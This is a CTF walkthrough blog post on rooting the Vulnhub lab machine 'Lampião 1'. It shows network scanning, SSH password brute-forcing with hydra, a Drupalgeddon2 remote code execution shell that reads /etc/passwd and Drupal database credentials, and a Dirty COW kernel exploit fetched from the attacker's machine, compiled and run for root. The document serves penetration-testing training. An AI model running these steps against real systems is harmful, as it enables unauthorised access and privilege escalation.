Lampião: 1 - red_dead_cangaço

Feb 26, 2019·
Jeff Soczek
Jeff Soczek
· 13 min read

This machine present in the private lab was made public in Vulnhub so I’m giving it another run.

Would you like to keep hacking in your own lab?

Try this brand new vulnerable machine! “Lampião 1”.

Get root!

Level: Easy

The virtual machine is up but I have no idea which IP address is assigned to it, so where’s our target?

┌─[root@rocinante]─[/home/w1zard/Documents/lab/vulnhub/lampiao]
└──╼ #arp-scan -I eth1 192.168.58.0/24
Interface: eth1, datalink type: EN10MB (Ethernet)
Starting arp-scan 1.9.5 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.58.1    00:50:56:c0:00:08   VMware, Inc.
192.168.58.2    00:50:56:f9:d1:19   VMware, Inc.
192.168.58.144  00:0c:29:80:d0:c8   VMware, Inc.
192.168.58.254  00:50:56:e5:1b:5a   VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9.5: 256 hosts scanned in 2.214 seconds (115.63 hosts/sec). 4 responded

Target located. Starting to enumerate. (All ports / TCP Connect / UDP Scan)

┌─[root@rocinante]─[/home/w1zard/Documents/lab/vulnhub/lampiao]
└──╼ #nmap -p- -sT -sU --min-rate 5000 192.168.58.144 -oA nmap-lampiao
Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-25 14:13 GMT
Warning: 192.168.58.144 giving up on port because retransmission cap hit (10).
Nmap scan report for 192.168.58.144
Host is up (0.0029s latency).
Not shown: 65682 closed ports, 65385 open|filtered ports
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
1898/tcp open  cymtec-port
MAC Address: 00:0C:29:80:D0:C8 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 146.97 seconds

We found some open ports, nice. Let me improve this scan (Selected ports / OS detection, version detection, script scanning, and traceroute):

┌─[root@rocinante]─[/home/w1zard/Documents/lab/vulnhub/lampiao]
└──╼ #nmap -p 22,80,1898 -sC -sV -A 192.168.58.144 -oA nmap-sC-lampiao
Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-25 14:18 GMT
Nmap scan report for 192.168.58.144
Host is up (0.00048s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 46:b1:99:60:7d:81:69:3c:ae:1f:c7:ff:c3:66:e3:10 (DSA)
|   2048 f3:e8:88:f2:2d:d0:b2:54:0b:9c:ad:61:33:59:55:93 (RSA)
|   256 ce:63:2a:f7:53:6e:46:e2:ae:81:e3:ff:b7:16:f4:52 (ECDSA)
|\_  256 c6:55:ca:07:37:65:e3:06:c1:d6:5b:77:dc:23:df:cc (ED25519)
80/tcp   open  http?
| fingerprint-strings: 
|   NULL: 
|     \_\_\_\_\_ \_ \_ 
|     |\_|/ \_\_\_ \_\_\_ \_\_ \_ \_\_\_ \_ \_ 
|     \\x20| \_\_/ (\_| \_\_ \\x20|\_| |\_ 
|     \_\_\_/ \_\_| |\_\_\_/ \_\_\_|\_\_,\_|\_\_\_/\_\_, ( ) 
|     |\_\_\_/ 
|     \_\_\_\_\_\_ \_ \_ \_ 
|     \_\_\_(\_) | | | |
|     \\x20/ \_\` | / \_ / \_\` | | | |/ \_\` | |
|\_    \_\_,\_|\_\_,\_|\_| |\_|
1898/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
|\_http-generator: Drupal 7 (http://drupal.org)
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/ 
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt 
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt 
|\_/LICENSE.txt /MAINTAINERS.txt
|\_http-server-header: Apache/2.4.7 (Ubuntu)
|\_http-title: Lampi\\xC3\\xA3o
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port80-TCP:V=7.70%I=7%D=2/25%Time=5C73F930%P=x86\_64-pc-linux-gnu%r(NULL
SF:,1179,"\\x20\_\_\_\_\_\\x20\_\\x20\\x20\\x20\_\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\
SF:x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20
SF:\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x2
SF:0\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\n\\|\_\\x20\\x20\\x20\_\\|\\x20\\|\\x20\\(\\x
SF:20\\)\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x2
SF:0\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x
SF:20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\
SF:x20\\n\\x20\\x20\\|\\x20\\|\\x20\\|\\x20\\|\_\\|/\\x20\_\_\_\\x20\\x20\\x20\\x20\_\_\_\\x20\\x20
SF:\_\_\\x20\_\\x20\_\_\_\\x20\_\\x20\\x20\\x20\_\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x2
SF:0\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\n
SF:\\x20\\x20\\|\\x20\\|\\x20\\|\\x20\_\_\\|\\x20/\\x20\_\_\\|\\x20\\x20/\\x20\_\\x20\\\\/\\x20\_\`\\
SF:x20/\\x20\_\_\\|\\x20\\|\\x20\\|\\x20\\|\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\
SF:x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\n\\x20\_\\
SF:|\\x20\\|\_\\|\\x20\\|\_\\x20\\x20\\\\\_\_\\x20\\\\\\x20\\|\\x20\\x20\_\_/\\x20\\(\_\\|\\x20\\\\\_\_\\x
SF:20\\\\\\x20\\|\_\\|\\x20\\|\_\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x2
SF:0\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\n\\x20\\\\\_\_\_/\\x20\\\\\_\_\\|
SF:\\x20\\|\_\_\_/\\x20\\x20\\\\\_\_\_\\|\\\\\_\_,\_\\|\_\_\_/\\\\\_\_,\\x20\\(\\x20\\)\\x20\\x20\\x20\\x20\\
SF:x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20
SF:\\x20\\x20\\n\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\
SF:x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20
SF:\\x20\\x20\_\_/\\x20\\|/\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\
SF:x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\n\\x20\\x20\\x20\\x20\\x20\\x
SF:20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\
SF:x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\|\_\_\_/\\x20\\x20\\x20\\x20\\x20\\x
SF:20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\
SF:x20\\x20\\x20\\x20\\n\_\_\_\_\_\_\\x20\_\\x20\\x20\\x20\\x20\\x20\\x20\\x20\_\\x20\\x20\\x20\\x
SF:20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\
SF:x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20
SF:\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\_\\x20\\n\\|\\x20\\x20\_\_\_\\(\_\\)\\x20\\x20\\x
SF:20\\x20\\x20\\|\\x20\\|\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\
SF:x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20
SF:\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\|\\x20\\|\\n\\
SF:|\\x20\\|\_\\x20\\x20\\x20\_\\x20\\x20\\x20\\x20\_\_\\|\\x20\\|\_\\x20\\x20\\x20\_\\x20\_\\x20\_
SF:\_\\x20\_\_\_\\x20\\x20\\x20\_\_\\x20\_\\x20\\x20\\x20\\x20\_\_\_\\x20\\x20\_\_\\x20\_\\x20\_\\x20\\
SF:x20\\x20\_\\x20\\x20\_\_\\x20\_\\|\\x20\\|\\n\\|\\x20\\x20\_\\|\\x20\\|\\x20\\|\\x20\\x20/\\x20
SF:\_\`\\x20\\|\\x20\\|\\x20\\|\\x20\\|\\x20'\_\\x20\`\\x20\_\\x20\\\\\\x20/\\x20\_\`\\x20\\|\\x20\\x
SF:20/\\x20\_\\x20\\\\/\\x20\_\`\\x20\\|\\x20\\|\\x20\\|\\x20\\|/\\x20\_\`\\x20\\|\\x20\\|\\n\\|\\x2
SF:0\\|\\x20\\x20\\x20\\|\\x20\\|\\x20\\|\\x20\\(\_\\|\\x20\\|\\x20\\|\_\\|\\x20\\|\\x20\\|\\x20\\|
SF:\\x20\\|\\x20\\|\\x20\\|\\x20\\(\_\\|\\x20\\|\\x20\\|\\x20\\x20\_\_/\\x20\\(\_\\|\\x20\\|\\x20\\|
SF:\_\\|\\x20\\|\\x20\\(\_\\|\\x20\\|\_\\|\\n\\\\\_\\|\\x20\\x20\\x20\\|\_\\|\\x20\\x20\\\\\_\_,\_\\|\\\\\_\_
SF:,\_\\|\_\\|\\x20\\|\_\\|");
MAC Address: 00:0C:29:80:D0:C8 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux\_kernel:3 cpe:/o:linux:linux\_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux\_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.48 ms 192.168.58.144

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 64.38 seconds

So there are two http ports. What they have to show us?

lampiao-00

http://192.168.58.144/

The page at port 80 doesn’t tell us much. The webscanner showed even less:

┌─[root@rocinante]─[/home/w1zard/Documents/lab/vulnhub/lampiao]
└──╼ #nikto -h http://192.168.58.144
- Nikto v2.1.6
---------------------------------------------------------------------------
+ No web server found on 192.168.58.144:80
---------------------------------------------------------------------------
+ 0 host(s) tested

lampiao-01

Let’s rule out port 80. Going on to port 1898 which seems more promising:
http://192.168.58.144:1898/

And the Nikto results for port 1898:

┌─[root@rocinante]─[/home/w1zard/Documents/lab/vulnhub/lampiao]
└──╼ #nikto -h 192.168.58.144:1898
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.58.144
+ Target Hostname:    192.168.58.144
+ Target Port:        1898
+ Start Time:         2019-02-25 17:41:13 (GMT0)
---------------------------------------------------------------------------
+ Server: Apache/2.4.7 (Ubuntu)
+ Retrieved x-powered-by header: PHP/5.5.9-1ubuntu4.24
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'x-generator' found, with contents: Drupal 7 (http://drupal.org)
+ OSVDB-3268: /scripts/: Directory indexing found.
+ Server leaks inodes via ETags, header found with file /robots.txt, fields: 0x88d 0x56a38bb208dd4 
+ OSVDB-3268: /includes/: Directory indexing found.
+ Entry '/includes/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ OSVDB-3268: /misc/: Directory indexing found.
+ Entry '/misc/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ OSVDB-3268: /modules/: Directory indexing found.
+ Entry '/modules/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ OSVDB-3268: /profiles/: Directory indexing found.
+ Entry '/profiles/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/scripts/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ OSVDB-3268: /themes/: Directory indexing found.
+ Entry '/themes/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/INSTALL.mysql.txt' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/INSTALL.pgsql.txt' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/INSTALL.sqlite.txt' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/install.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/LICENSE.txt' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/MAINTAINERS.txt' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/UPGRADE.txt' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/xmlrpc.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/?q=filter/tips/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/?q=user/password/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/?q=user/register/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/?q=user/login/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 68 entries which should be manually viewed.
+ Apache/2.4.7 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details.
+ OSVDB-3092: /web.config: ASP config file is accessible.
+ OSVDB-3092: /includes/: This might be interesting...
+ OSVDB-3092: /misc/: This might be interesting...
+ OSVDB-3092: /scripts/: This might be interesting... possibly a system shell found.
+ OSVDB-3092: /UPGRADE.txt: Default file found.
+ OSVDB-3092: /install.php: Drupal install.php file found.
+ OSVDB-3092: /install.php: install.php file found.
+ OSVDB-3092: /LICENSE.txt: License file found may identify site software.
+ OSVDB-3092: /xmlrpc.php: xmlrpc.php was found.
+ OSVDB-3233: /INSTALL.mysql.txt: Drupal installation file found.
+ OSVDB-3233: /INSTALL.pgsql.txt: Drupal installation file found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ OSVDB-3268: /sites/: Directory indexing found.
+ 8417 requests: 0 error(s) and 45 item(s) reported on remote host
+ End Time:           2019-02-25 17:41:45 (GMT0) (32 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

The first time I saw this machine, Drupalgeddon still wasn’t in the wild so the investigation to get access was a bit more elaborate. This machine have clues that will let you in. Drupalgeddon comes kicking the door open so I’ll leave this exploit as a bonus later in this writeup.

lampiao-02

The index page has some information that can be usefull. You don’t even need to understand brazilian portuguese.

Lampião, herói ou vilão do Sertão? - http://192.168.58.144:1898/?q=node/1
So much text here, this may help later.

First article… - http://192.168.58.144:1898/?q=node/3
There’s this reference for a .mp3 file and then this message saying node 2 isn’t working.

Whishfull thinking with this file:

┌─[root@rocinante]─[/home/w1zard/Documents/lab/vulnhub/lampiao]
└──╼ #wget http://192.168.58.144:1898/LuizGonzaga-LampiaoFalou.mp3 -O LuizGonzaga-LampiaoFalou.mp3
--2019-02-25 17:55:47--  http://192.168.58.144:1898/LuizGonzaga-LampiaoFalou.mp3
Connecting to 192.168.58.144:1898... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3427612 (3.3M)

Saving to: ‘LuizGonzaga-LampiaoFalou.mp3’
LuizGonzaga-LampiaoFalou. 100%\[===================================>\]   3.27M  --.-KB/s    in 0.06s   
2019-02-25 17:55:47 (56.8 MB/s) - ‘LuizGonzaga-LampiaoFalou.mp3’ saved \[3427612/3427612\]

Hey, it exists!

┌─[root@rocinante]─[/home/w1zard/Documents/lab/vulnhub/lampiao]
└──╼ #file LuizGonzaga-LampiaoFalou.mp3 
LuizGonzaga-LampiaoFalou.mp3: Audio file with ID3 version 2.4.0, contains:MPEG ADTS, layer III, v1, 192 kbps, 44.1 kHz, JntStereo

Aaaand it is really a music, forró, no clues here.
But what about that node 2? Was it really not working?

lampiao-03

Test - http://192.168.58.144:1898/?q=node/2

This cangaceiro is trying to fool me. Not today mate.
And if we were able to download that .mp3, maybe these other files are available too.

┌─[root@rocinante]─[/home/w1zard/Documents/lab/vulnhub/lampiao]
└──╼ #wget http://192.168.58.144:1898/audio.m4a -O audio.m4a
--2019-02-25 18:08:56--  http://192.168.58.144:1898/audio.m4a
Connecting to 192.168.58.144:1898... connected.
HTTP request sent, awaiting response... 200 OK
Length: 34715 (34K)

Saving to: ‘audio.m4a’
audio.m4a                 100%\[===================================>\]  33.90K  --.-KB/s    in 0.002s  
2019-02-25 18:08:56 (15.9 MB/s) - ‘audio.m4a’ saved \[34715/34715\]
┌─[root@rocinante]─[/home/w1zard/Documents/lab/vulnhub/lampiao]
└──╼ #wget http://192.168.58.144:1898/qrc.png -O qrc.png
--2019-02-25 18:09:12--  http://192.168.58.144:1898/qrc.png
Connecting to 192.168.58.144:1898... connected.
HTTP request sent, awaiting response... 200 OK
Length: 9674 (9.4K) \[image/png\]
Saving to: ‘qrc.png’
qrc.png                   100%\[===================================>\]   9.45K  --.-KB/s    in 0.001s  
2019-02-25 18:09:13 (14.7 MB/s) - ‘qrc.png’ saved \[9674/9674\]

Bingo! But what are they?

┌─[root@rocinante]─[/home/w1zard/Documents/lab/vulnhub/lampiao]
└──╼ #file audio.m4a 
audio.m4a: ISO Media, MP4 v2 \[ISO 14496-14\]
┌─[root@rocinante]─[/home/w1zard/Documents/lab/vulnhub/lampiao]
└──╼ #file qrc.png 
qrc.png: PNG image data, 225 x 213, 8-bit/color RGBA, non-interlaced

I listened to the audio file using Rhytmbox: “user t i a g o”.

lampiao-04

Great, we have an user to try. And this QR code? What does it tell us?

“Try harder! muahuahua”

Ok. :sigh: What to do next?

That node/1 page is sitting there, patiently waiting for us to abuse it. Since we got an user that needs a password, I am going to create a dictionary to brute force the ssh.

┌─[root@rocinante]─[/home/w1zard/Documents/lab/vulnhub/lampiao]
└──╼ #cewl -w lampiao.txt -m 6 http://192.168.58.144:1898/?q=node/1
CeWL 5.4.4.1 (Arkanoid) Robin Wood ([email protected]) (https://digi.ninja/)

┌─\[root@rocinante\]─\[/home/w1zard/Documents/lab/vulnhub/lampiao\]
└──╼ #wc -l lampiao.txt 
506 lampiao.txt

Using any word with at least 6 characters got us a dictionary with 506 entries.

Hydra, can you brute force this to me, please?

┌─[root@rocinante]─[/home/w1zard/Documents/lab/vulnhub/lampiao]
└──╼ #hydra -v -V -l tiago -P lampiao.txt 192.168.58.144 ssh
\[...\]
\[22\]\[ssh\] host: 192.168.58.144   login: tiago   password: Virgulino
\[...\]

Thanky you Hydra. Now I can open a ssh connection:

┌─[root@rocinante]─[/home/w1zard/Documents/lab/vulnhub/lampiao]
└──╼ #ssh [email protected]
The authenticity of host '192.168.58.144 (192.168.58.144)' can't be established.
ECDSA key fingerprint is SHA256:64C0fMfgIRp/7K8EpiEiirq/SrPByxrzXzn7bLIqxbU.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.58.144' (ECDSA) to the list of known hosts.
[email protected]'s password: 
Welcome to Ubuntu 14.04.5 LTS (GNU/Linux 4.4.0-31-generic i686)

 \* Documentation:  https://help.ubuntu.com/

  System information as of Mon Feb 25 10:42:54 BRT 2019

  System load: 0.08              Memory usage: 11%   Processes:       201
  Usage of /:  7.5% of 19.07GB   Swap usage:   0%    Users logged in: 0

  Graph this data and manage this system at:
    https://landscape.canonical.com/

New release '16.04.5 LTS' available.
Run 'do-release-upgrade' to upgrade to it.

Last login: Fri Apr 20 14:40:55 2018 from 192.168.108.1
tiago@lampiao:~$ pwd
/home/tiago

Great, since we are here, why not get root?

But first… let me get access using that Drupalgeddon exploit.
We know we got a Drupal in our hands. The CHANGELOG.txt will show us which version we are dealing with.

┌─[root@rocinante]─[/home/w1zard/Documents/lab/vulnhub/lampiao]
└──╼ #curl http://192.168.58.144:1898/CHANGELOG.txt
Drupal 7.54, 2017-02-01
-----------------------

Where’s this exploit we are going to use?

┌─[root@rocinante]─[/home/w1zard/Documents/lab/vulnhub/lampiao]
└──╼ #searchsploit drupal
-------------------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                                        |  Path
                                                                                      | (/usr/share/exploitdb/)
-------------------------------------------------------------------------------------- ----------------------------------------
\[...\]
Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code (Metasploit)              | exploits/php/webapps/44557.rb
Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code Execution (PoC)           | exploits/php/webapps/44542.txt
Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution   | exploits/php/webapps/44449.rb
Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (Metasploi | exploits/php/remote/44482.rb
Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (PoC)      | exploits/php/webapps/44448.py
\[...\]
-------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result

From all the results I’ve narrowed the list to a few ones that match the Drupal version and I’ll give a try to exploit 44449.rb and avoid the Metasploit (OSCP tip: avoid using Metasploit whenever possible). Drupalgeddon 3 also will not work ‘cause it needs drupal authentication and so far we have none.

┌─[root@rocinante]─[/home/w1zard/Documents/lab/vulnhub/lampiao]
└──╼ #searchsploit -m 44449.rb
  Exploit: Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution
      URL: https://www.exploit-db.com/exploits/44449/
     Path: /usr/share/exploitdb/exploits/php/webapps/44449.rb
File Type: Ruby script, ASCII text, with CRLF line terminators
Copied to: /home/w1zard/Documents/lab/vulnhub/lampiao/44449.rb

lampiao-05

boi that was fast:

This shell is a bit wanky and we are logged in as www-data. We need better credentials.

lampiao>> uname -a
Linux lampiao 4.4.0-31-generic #50~14.04.1-Ubuntu SMP Wed Jul 13 01:06:37 UTC 2016 i686 i686 i686 GNU/Linux
lampiao>> cat /etc/issue
Ubuntu 14.04.5 LTS \\n \\l
lampiao>> cat /etc/passwd
tiago:x :1000:1000:tiago,,,:/home/tiago:/bin/bash
sshd:x :105:65534::/var/run/sshd:/usr/sbin/nologin
root:x :0:0:root:/root:/bin/bash
daemon:x :1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x :2:2:bin:/bin:/usr/sbin/nologin
sys:x :3:3:sys:/dev:/usr/sbin/nologin
sync:x :4:65534:sync:/bin:/bin/sync
games:x :5:60:games:/usr/games:/usr/sbin/nologin
man:x :6:12:man :/var/cache/man:/usr/sbin/nologin
lp:x :7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x :8:8:mail:/var/mail:/usr/sbin/nologin
news:x :9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x :10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x :13:13:proxy:/bin:/usr/sbin/nologin
www-data:x :33:33:www-data:/var/www:/usr/sbin/nologin
backup:x :34:34:backup:/var/backups:/usr/sbin/nologin
list:x :38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x :39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x :41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x :65534:65534:nobody:/nonexistent:/usr/sbin/nologin
libuuid:x : 100:101::/var/lib/libuuid:
syslog:x :101:104::/home/syslog:/bin/false
mysql:x :102:106:MySQL Server,,,:/nonexistent

We got an user. We may get more information from drupal’s settings.php file.

lampiao>> cat sites/default/settings.php
<?php \[...\] $databases = array ( 'default' => 
  array (
    'default' => 
    array (
      'database' => 'drupal',
      'username' => 'drupaluser',
      'password' => 'Virgulino',
      'host' => 'localhost',
      'port' => '',
      'driver' => 'mysql',
      'prefix' => '',
    ),
  ),
);

\[...\]

And the Drupalgeddon2 participation ends here as we are now using the same user found through the information available in the site. Back to privesc.

Tip: Finding the working exploit for a box is more of a trial and error process. As you gain experience you will be able to make more educated guesses.

┌─[root@rocinante]─[/home/w1zard/Documents/lab/vulnhub/lampiao]
└──╼ #searchsploit cow
------------------------------------------------------------- ----------------------------------------
 Exploit Title                                               |  Path
                                                             | (/usr/share/exploitdb/)
------------------------------------------------------------- ----------------------------------------
COWON America jetCast 2.0.4.1109 - '.mp3' Local Overflow     | exploits/windows/local/8780.php
CiscoWorks Common Services 3.1.1 - Auditing Directory Traver | exploits/java/webapps/35781.txt
CiscoWorks Common Services Framework 3.1.1 Help Servlet - Cr | exploits/hardware/remote/35779.txt
Jcow 4.2.1 - Local File Inclusion                            | exploits/php/webapps/17297.txt
Jcow Social Networking Script 4.2 < 5.2 - Arbitrary Code Exe | exploits/php/webapps/17722.rb
JetAudio 7.5.3 COWON Media Center - '.wav' Crash             | exploits/windows/dos/9139.pl
Linux Kernel - 'The Huge Dirty Cow' Overwriting The Huge Zer | exploits/linux/dos/43199.c
Linux Kernel - 'The Huge Dirty Cow' Overwriting The Huge Zer | exploits/linux/dos/44305.c
Linux Kernel 2.6.22 < 3.9 (x86/x64) - 'Dirty COW /proc/self/ | exploits/linux/local/40616.c
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW /proc/self/mem' Race  | exploits/linux/local/40847.cpp
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW PTRACE\_POKEDATA' Race | exploits/linux/local/40838.c
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE\_POKEDATA' Ra | exploits/linux/local/40839.c
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' /proc/self/mem Race  | exploits/linux/local/40611.c
Mailcow 0.14 - Cross-Site Request Forgery                    | exploits/php/webapps/42004.txt
Tucows Client Code Suite (CSS) 1.2.1015 - Remote File Inclus | exploits/php/webapps/2896.txt
coWiki - 'index.php' Cross-Site Scripting                    | exploits/php/webapps/30515.txt
jetAudio 7.0.5 COWON Media Center MP4 - Local Stack Overflow | exploits/windows/local/4751.pl
phpCow 2.1 - File Inclusion                                  | exploits/php/webapps/15447.txt
------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result

After some trial and error experience, 40847.cpp is a commonly safe bet.

┌─[root@rocinante]─[/home/w1zard/Documents/lab/vulnhub/lampiao]
└──╼ #searchsploit -m 40847.cpp
  Exploit: Linux Kernel 2.6.22 < 3.9 - 'Dirty COW /proc/self/mem' Race Condition Privilege Escalation (/etc/passwd Method)
      URL: https://www.exploit-db.com/exploits/40847/
     Path: /usr/share/exploitdb/exploits/linux/local/40847.cpp
File Type: C++ source, ASCII text, with CRLF line terminators
Copied to: /home/w1zard/Documents/lab/vulnhub/lampiao/40847.cpp

These dirt cow exploits come with compiling instruction, neat!

┌─[root@rocinante]─[/home/w1zard/Documents/lab/vulnhub/lampiao]
└──╼ #head 40847.cpp 
// EDB-Note: Compile:   g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil
// EDB-Note: Recommended way to run:   ./dcow -s    (Will automatically do "echo 0 > /proc/sys/vm/dirty\_writeback\_centisecs")

But it needs to be compiled in the target, so I going to start our python webserver:

┌─[root@rocinante]─[/home/w1zard/Documents/lab/vulnhub/lampiao]
└──╼ #python -m SimpleHTTPServer 8080
Serving HTTP on 0.0.0.0 port 8080 ...

Downloading the exploit from the attacker

tiago@lampiao:/tmp$ wget http://192.168.58.142:8080/40847.cpp -O 40847.cpp
--2019-02-25 14:03:02--  http://192.168.58.142:8080/40847.cpp
Connecting to 192.168.58.142:8080... connected.
HTTP request sent, awaiting response... 200 OK
Length: 10531 (10K) \[text/x-c++src\]
Saving to: ‘40847.cpp’
100%\[============================================================>\] 10,531      --.-K/s   in 0s      
2019-02-25 14:03:02 (353 MB/s) - ‘40847.cpp’ saved \[10531/10531\]

Compile…

tiago@lampiao:/tmp$ g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil

… and run:

tiago@lampiao:/tmp$ ./dcow -s
Running ...
Password overridden to: dirtyCowFun

Received su prompt (Password: )
echo 0 > /proc/sys/vm/dirty\_writeback\_centisecs
cp /tmp/.ssh\_bak /etc/passwd
rm /tmp/.ssh\_bak
root@lampiao:~# echo 0 > /proc/sys/vm/dirty\_writeback\_centisecs
root@lampiao:~# cp /tmp/.ssh\_bak /etc/passwd
root@lampiao:~# rm /tmp/.ssh\_bak
root@lampiao:~# ls
flag.txt
root@lampiao:~# cat flag.txt 
9740616875908d9lddcdaa8aea3af366

You are such a hacker man!